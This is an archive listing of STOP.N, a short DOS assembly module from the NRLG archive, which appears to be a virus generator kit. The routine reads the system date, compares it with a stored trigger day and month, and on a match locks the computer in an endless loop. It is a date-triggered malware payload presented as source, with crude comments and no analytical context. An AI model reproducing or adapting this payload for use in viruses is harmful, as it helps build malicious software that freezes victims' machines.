home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / NRLG.ZIP / STOP.N < prev    next >
Text File  |  1994-01-01  |  885b  |  21 lines

  1. ;---------------------------------
  2. action:                          ; 
  3. MOV AH,2AH                       ;        
  4. INT 21H                          ;get date           
  5. CMP Dl,byte ptr cs:[action_dia+bp]  ;is equal to my day?                 
  6. JE  cont                         ;nop! fuck ret          
  7. cmp byte ptr cs:[action_dia+bp],32  ;
  8. jne no_day                       ;
  9. cont:                            ; 
  10. cmp dh,byte ptr cs:[action_mes+bp]  ;is equal to my month?            
  11. je set                           ;
  12. cmp byte ptr cs:[action_mes+bp],13  ;
  13. jne NO_DAY                       ;nop! fuck ret           
  14. set:                             ; 
  15.            
  16. j:                               ;
  17. jmp j                            ;Halt the process 
  18. NO_DAY:                          ;             
  19. ret                              ;
  20. ;---------------------------------
  21.